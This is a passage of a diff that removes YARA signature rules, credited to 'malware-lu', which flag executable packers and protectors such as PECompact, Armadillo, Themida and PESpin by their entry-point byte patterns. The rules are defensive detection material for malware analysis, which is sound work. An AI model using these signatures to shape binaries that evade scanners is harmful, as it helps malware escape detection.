-		$a0 = { 80 7C 24 08 01 0F 85 ?? 01 00 00 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF E8 9F 01 00 00 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 95 AA 0A 00 00 89 85 F9 0A 00 00 EB 14 60 FF B5 F9 0A 00 00 FF 34 37 FF 74 37 04 FF D3 61 83 C7 08 83 3C 37 00 75 E6 83 BD 0D 0B 00 00 00 74 0E 83 BD 11 0B 00 00 00 74 05 E8 F6 01 00 00 8D 74 37 04 53 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 95 AA 0A 00 00 89 85 1D 0B 00 00 5B 60 FF B5 F9 0A 00 00 56 FF B5 1D 0B 00 00 FF D3 61 8B B5 1D 0B 00 00 8B C6 EB 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PKLITEv100v103
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? BA ?? ?? 8C DB 03 D8 3B }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Shrinkerv34
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 3D B4 ?? ?? ?? ?? 55 8B EC 56 57 75 6B 68 00 01 00 00 E8 ?? 0B 00 00 83 C4 04 8B 75 08 A3 B4 ?? ?? ?? 85 F6 74 23 83 7D 0C 03 77 1D 68 FF }
-	$a1 = { BB ?? ?? BA ?? ?? 81 C3 07 00 B8 40 B4 B1 04 D3 E8 03 C3 8C D9 49 8E C1 26 03 0E 03 00 2B }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule Shrinkerv32
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 3D ?? ?? ?? ?? ?? 55 8B EC 56 57 75 65 68 00 01 ?? ?? E8 ?? E6 FF FF 83 C4 04 8B 75 08 A3 ?? ?? ?? ?? 85 F6 74 1D 68 FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Shrinkerv33
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 3D ?? ?? ?? 00 00 55 8B EC 56 57 75 65 68 00 01 00 00 E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01JDPack1xJDProtect09Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 22 00 00 00 5D 8B D5 81 ED 90 90 90 90 2B 95 90 90 90 90 81 EA 06 90 90 90 89 95 90 90 90 90 83 BD 45 00 01 00 01 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Upack024027beta028alphaDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE 88 01 40 00 AD 8B F8 95 AD 91 F3 A5 AD B5 ?? F3 AB AD 50 97 51 58 8D 54 85 5C FF 16 72 57 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1 E3 ?? B3 00 8D 1C 5B 8D 9C 9D 0C 10 00 00 B0 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01LocklessIntroPackAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 2C E8 EB 1A 90 90 5D 8B C5 81 ED F6 73 90 90 2B 85 90 90 90 90 83 E8 06 89 85 FF 01 EC AD E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov250b3
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 B8 ?? ?? ?? 68 F8 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 20 ?? ?? ?? 33 D2 8A D4 89 15 D0 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEBundlev02v20x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB ?? ?? 40 ?? 87 DD 6A 04 68 ?? 10 ?? ?? 68 ?? 02 ?? ?? 6A ?? FF 95 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SoftProtectwwwsoftprotectbyru
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? C7 00 00 00 00 00 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 ?? ?? ?? ?? ?? 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NTPackerV2XErazerZ
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 4B 57 69 6E 64 6F 77 73 00 10 55 54 79 70 65 73 00 00 3F 75 6E 74 4D 61 69 6E 46 75 6E 63 74 69 6F 6E 73 00 00 47 75 6E 74 42 79 70 61 73 73 00 00 B7 61 50 4C 69 62 75 00 00 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule SiliconRealmsInstallStub
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 ?? 92 40 00 68 ?? ?? 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 ?? ?? 40 00 33 D2 8A D4 89 15 ?? ?? 40 00 8B C8 81 E1 FF 00 00 00 89 0D ?? ?? 40 00 C1 E1 08 03 CA 89 0D ?? ?? 40 00 C1 E8 10 A3 }
-
-condition:
-		$a0
-}
-	
-	
-rule Armadillov430v440SiliconRealmsToolworks
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 40 ?? ?? 00 68 80 ?? ?? 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 88 ?? ?? 00 33 D2 8A D4 89 15 30 ?? ?? 00 8B C8 81 E1 FF 00 00 00 89 0D 2C ?? ?? 00 C1 E1 08 03 CA 89 0D 28 ?? ?? 00 C1 E8 10 A3 24 }
-	$a1 = { 60 E8 00 00 00 00 5D 50 51 0F CA F7 D2 9C F7 D2 0F CA EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 9D 0F C9 8B CA F7 D1 59 58 50 51 0F CA F7 D2 9C F7 D2 0F CA EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule MoleBoxv20
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? ?? ?? 60 E8 4F }
-
-condition:
-		$a0
-}
-	
-	
-rule FucknJoyv10cUsAr
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED D8 05 40 00 FF 74 24 20 E8 8C 02 00 00 0B C0 0F 84 2C 01 00 00 89 85 6C 08 40 00 8D 85 2F 08 40 00 50 FF B5 6C 08 40 00 E8 EF 02 00 00 0B C0 0F 84 0C 01 00 00 89 85 3B 08 40 00 8D 85 3F 08 40 00 50 FF B5 6C 08 40 00 E8 CF 02 00 }
-	$a1 = { 60 E8 00 00 00 00 5D 81 ED D8 05 40 00 FF 74 24 20 E8 8C 02 00 00 0B C0 0F 84 2C 01 00 00 89 85 6C 08 40 00 8D 85 2F 08 40 00 50 FF B5 6C 08 40 00 E8 EF 02 00 00 0B C0 0F 84 0C 01 00 00 89 85 3B 08 40 00 8D 85 3F 08 40 00 50 FF B5 6C 08 40 00 E8 CF 02 00 00 0B C0 0F 84 EC 00 00 00 89 85 4D 08 40 00 8D 85 51 08 40 00 50 FF B5 6C 08 40 00 E8 AF 02 00 00 0B C0 0F 84 CC 00 00 00 89 85 5C 08 40 00 8D 85 67 07 40 00 E8 7B 02 00 00 8D B5 C4 07 40 00 56 6A 64 FF 95 74 07 40 00 46 80 3E 00 75 FA C7 06 74 6D 70 2E 83 C6 04 C7 06 65 78 65 00 8D 85 36 07 40 00 E8 4C 02 00 00 33 DB 53 53 6A 02 53 53 68 00 00 00 40 8D 85 C4 07 40 00 50 FF 95 74 07 40 00 89 85 78 07 40 00 8D 85 51 07 40 00 E8 21 02 00 00 6A 00 8D 85 7C 07 40 00 50 68 00 ?? ?? 00 8D 85 F2 09 40 00 50 FF }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02VideoLanClientAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 83 EC 08 90 90 90 90 90 90 90 90 90 90 90 90 90 90 01 FF FF 01 01 01 00 01 90 90 90 90 90 90 90 90 90 90 90 90 90 90 00 01 00 01 00 01 90 90 00 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SoftWrap
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 52 53 51 56 57 55 E8 ?? ?? ?? ?? 5D 81 ED 36 ?? ?? ?? E8 ?? 01 ?? ?? 60 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AI1Creator1Beta2byMZ
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 FE FD FF FF 6A 00 E8 0D 00 00 00 CC FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule JAMv211
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 06 16 07 BE ?? ?? 8B FE B9 ?? ?? FD FA F3 2E A5 FB 06 BD ?? ?? 55 CB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv0978
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 24 88 40 ?? 87 DD 8B 85 A9 88 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Setup2GoInstallerStub
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 5B 53 45 54 55 50 5F 49 4E 46 4F 5D 0D 0A 56 65 72 }
-
-condition:
-		$a0
-}
-	
-	
-rule themida1005httpwwworeanscom
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule yodasProtectorv1033exescrcomAshkbizDanehkar
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8E 00 00 00 E8 03 00 00 00 EB 01 ?? E8 81 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B7 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AA 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ORiENv211DEMO
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 5D 01 00 00 CE D1 CE CE 0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 0D 0A 2D 20 4F 52 69 45 4E 20 65 78 65 63 75 74 61 62 6C 65 20 66 69 6C 65 73 20 70 72 6F }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv0977
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB A0 86 40 ?? 87 DD 8B 85 2A 87 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PESpinv13betaCyberbob
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 71 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RCryptorv13bVaska
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 61 83 EF 4F 60 68 ?? ?? ?? ?? FF D7 }
-	$a1 = { 61 83 EF 4F 60 68 ?? ?? ?? ?? FF D7 B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule mkfpackllydd
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 5B 81 EB 05 00 00 00 8B 93 9F 08 00 00 53 6A 40 68 00 10 00 00 52 6A 00 FF 93 32 08 00 00 5B 8B F0 8B BB 9B 08 00 00 03 FB 56 57 E8 86 08 00 00 83 C4 08 8D 93 BB 08 00 00 52 53 FF E6 }
-
-condition:
-		$a0
-}
-	
-	
-rule PESpinV03cyberbob
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 CB 2C 40 00 8B 42 3C 03 C2 89 85 D5 2C 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D E9 2C 40 00 53 8F 85 B6 2B 40 00 BB ?? 00 00 00 B9 75 0A 00 00 8D BD 7E 2D 40 00 4F 30 1C 39 FE CB E2 F9 68 3C 01 00 00 59 8D BD B6 36 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 1F 53 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D DC 2C 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02BorlandDelphiSetupModuleAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 90 53 56 57 33 C0 89 45 F0 89 45 D4 89 45 D0 E8 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PELOCKnt204
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 03 CD 20 C7 1E EB 03 CD 20 EA 9C EB 02 EB 01 EB 01 EB 60 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MacromediaWindowsFlashProjectorPlayerv60
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 EC 44 56 FF 15 24 81 49 00 8B F0 8A 06 3C 22 75 1C 8A 46 01 46 3C 22 74 0C 84 C0 74 08 8A 46 01 46 3C 22 75 F4 80 3E 22 75 0F 46 EB 0C }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule IMPostorPack10MahdiHezavehi
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE ?? ?? ?? 00 83 C6 01 FF E6 00 00 00 00 ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 ?? 02 ?? ?? 00 10 00 00 00 02 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PluginToExev102BoBBobSoft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 29 C0 5D 81 ED 32 42 40 00 50 8F 85 DD 40 40 00 50 FF 95 11 42 40 00 89 85 D9 40 40 00 FF 95 0D 42 40 00 50 FF 95 21 42 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 25 42 40 00 89 85 E1 40 40 00 EB 6C 6A 01 8F 85 DD 40 40 00 6A 58 6A 40 FF 95 15 42 40 00 89 85 D5 40 40 00 89 C7 68 00 08 00 00 6A 40 FF 95 15 42 40 00 89 47 1C C7 07 58 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PKLITEv120
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 06 ?? ?? 72 ?? B4 09 BA ?? ?? CD 21 B4 4C CD 21 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PrivateexeProtectorV18SetiSoftTeam
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? 00 00 00 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 }
-
-condition:
-		$a0
-}
-	
-	
-rule PENinjamodified
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 5D 8B C5 81 ED B2 2C 40 00 2B 85 94 3E 40 00 2D 71 02 00 00 89 85 98 3E 40 00 0F B6 B5 9C 3E 40 00 8B FD }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule DotFixNiceProtect21GPcHSoft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 FF 00 00 00 60 8B 74 24 24 8B 7C 24 28 FC B2 80 33 DB A4 B3 02 E8 6D 00 00 00 73 F6 33 C9 E8 64 00 00 00 73 1C 33 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 12 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 2B CB 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4D 13 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 8E 02 D2 75 05 8A 16 46 12 D2 C3 33 C9 41 E8 EE FF FF FF 13 C9 E8 E7 FF FF FF 72 F2 C3 2B 7C 24 28 89 7C 24 1C 61 C3 60 B8 ?? ?? ?? ?? 03 C5 50 B8 ?? ?? ?? ?? 03 C5 FF 10 BB ?? ?? ?? ?? 03 DD 83 C3 0C 53 50 B8 ?? ?? ?? ?? 03 C5 FF 10 6A 40 68 00 10 00 00 FF 74 24 2C 6A 00 FF D0 89 44 24 1C 61 C3 }
-
-condition:
-		$a0
-}
-	
-	
-rule EXEStealthv276WebToolMaster
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 65 45 78 65 53 74 65 61 6C 74 68 20 56 32 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 20 59 4F 55 52 20 41 44 20 48 45 52 45 21 50 69 52 41 43 59 20 69 53 20 41 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXECryptor239DLLcompressedresources
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 68 ?? ?? ?? ?? 58 C1 C0 0F E9 ?? ?? ?? 00 87 04 24 58 89 45 FC E9 ?? ?? ?? FF FF 05 ?? ?? ?? ?? E9 ?? ?? ?? 00 C1 C3 18 E9 ?? ?? ?? ?? 8B 55 08 09 42 F8 E9 ?? ?? ?? FF 83 7D F0 01 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? 00 87 34 24 5E 8B 45 FC 33 D2 56 8B F2 E9 ?? ?? ?? 00 BA ?? ?? ?? ?? E8 ?? ?? ?? 00 A3 ?? ?? ?? ?? C3 E9 ?? ?? ?? 00 C3 83 C4 04 C3 E9 ?? ?? ?? FF 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 E8 ?? ?? ?? 00 E9 ?? ?? ?? FF C1 C2 03 81 CA ?? ?? ?? ?? 81 C2 ?? ?? ?? ?? 03 C2 5A E9 ?? ?? ?? FF 81 E7 ?? ?? ?? ?? 81 EF ?? ?? ?? ?? 81 C7 ?? ?? ?? ?? 89 07 E9 ?? ?? ?? ?? 0F 89 ?? ?? ?? ?? 87 14 24 5A 50 C1 C8 10 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UnoPiX103110BaGiE
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 EC 04 C7 04 24 00 ?? ?? ?? C3 00 ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? 00 10 00 00 00 02 00 00 01 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 ?? ?? 00 00 10 00 00 00 00 00 00 02 00 00 ?? 00 00 ?? 00 00 ?? ?? 00 00 00 10 00 00 10 00 00 00 00 00 00 10 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv110b3
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 95 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 BB 95 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule IonicWindSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9B DB E3 9B DB E2 D9 2D 00 ?? ?? 00 55 89 E5 E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SimplePackV11XMethod2bagie
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 4D 5A 90 EB 01 00 52 E9 89 01 00 00 50 45 00 00 4C 01 02 00 }
-	$a1 = { 4D 5A 90 EB 01 00 52 E9 89 01 00 00 50 45 00 00 4C 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 0F 03 0B 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0C 00 00 00 00 ?? ?? ?? 00 10 00 00 00 02 00 00 01 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 }
-
-condition:
-		$a0 or $a1
-}
-	
-	
-rule PCGuardv500d
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FC 55 50 E8 00 00 00 00 5D 60 E8 03 00 00 00 83 EB 0E EB 01 0C 58 EB 01 35 40 EB 01 36 FF E0 0B 61 B8 30 D2 40 00 EB 01 E3 60 E8 03 00 00 00 D2 EB 0B 58 EB 01 48 40 EB 01 35 FF E0 E7 61 2B E8 9C EB 01 D5 9D EB 01 0B 58 60 E8 03 00 00 00 83 EB 0E EB 01 0C }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PESHiELDv0251
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 5D 83 ED 06 EB 02 EA 04 8D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPackFullEdition117DLLaPLibAp0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 53 03 00 00 8D 9D 02 02 00 00 33 FF E8 ?? ?? ?? ?? EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv110b4
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 95 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 BB 44 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02PEX099Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 01 00 00 00 55 83 C4 04 E8 01 00 00 00 90 5D 81 FF FF FF 00 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ThinstallVirtualizationSuite30XThinstallCompany
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 00 00 00 00 58 BB ?? ?? ?? ?? 2B C3 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 BA FE FF FF E9 ?? ?? ?? ?? CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA }
-	$a1 = { 9C 60 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 00 00 00 00 58 BB ?? ?? ?? ?? 2B C3 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 BA FE FF FF E9 ?? ?? ?? ?? CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA ?? ?? ?? ?? 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 ?? ?? ?? ?? E8 DF 00 00 00 73 1B 55 BD ?? ?? ?? ?? E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule NullsoftInstallSystemv20
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 EC 0C 53 55 56 57 C7 44 24 10 70 92 40 00 33 DB C6 44 24 14 20 FF 15 2C 70 40 00 53 FF 15 84 72 40 00 BE 00 54 43 00 BF 00 04 00 00 56 57 A3 A8 EC 42 00 FF 15 C4 70 40 00 E8 8D FF FF FF 8B 2D 90 70 40 00 85 C0 75 21 68 FB 03 00 00 56 FF 15 5C 71 40 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule SLVc0deProtectorv11SLV
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 58 C6 00 EB C6 40 01 08 FF E0 E9 4C }
-	$a1 = { E8 01 00 00 00 A0 5D EB 01 69 81 ED 5F 1A 40 00 8D 85 92 1A 40 00 F3 8D 95 83 1A 40 00 8B C0 8B D2 2B C2 83 E8 05 89 42 01 E8 FB FF FF FF 69 83 C4 08 E8 06 00 00 00 69 E8 F2 FF FF FF F3 B9 05 00 00 00 51 8D B5 BF 1A 40 00 8B FE B9 58 15 00 00 AC 32 C1 F6 }
-
-condition:
-		$a0 at pe.entry_point or $a1
-}
-	
-	
-rule FreeJoinerSmallbuild031032GlOFF
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 32 ?? 66 8B C3 58 E8 ?? FD FF FF 6A 00 E8 0D 00 00 00 CC FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SLVc0deProtectorv06SLV
-{
-      meta:
-		author="malware-lu"
-strings:
